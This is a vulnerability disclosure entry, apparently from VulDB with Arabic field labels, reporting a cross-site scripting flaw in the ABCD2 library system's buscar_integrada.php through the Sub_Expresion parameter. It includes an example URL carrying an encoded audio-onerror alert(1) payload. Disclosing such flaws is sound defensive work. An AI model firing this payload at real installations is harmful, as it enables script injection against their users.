| عنوان | ABCD Community ABCD2 2.x Cross Site Scripting |
|---|
| الوصف | There is a Cross Site Scripting (XSS) vulnerability in buscar_integrada.php file, using the parameter Sub_Expresion.
Example: https://XXXXX/opac/php/buscar_integrada.php?lang=pt&base=acervo&modo=1B&alcance=and&Opcion=libre&prefijo=TW_&Sub_Expresion=MG_00056fas%3Caudio%20src/onerror=alert(1)%3E |
|---|
| المصدر | ⚠️ https://github.com/peritocibernetico/ABCD_Vulnerabilities |
|---|
| المستخدم | peritocibernetico (UID 74140) |
|---|
| ارسال | 27/08/2024 08:52 PM (2 سنوات منذ) |
|---|
| الاعتدال | 04/09/2024 10:39 AM (8 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 276491 [ABCD ABCD2 حتى 2.2.0-beta-1 /buscar_integrada.php Sub_Expresion البرمجة عبر المواقع] |
|---|
| النقاط | 18 |
|---|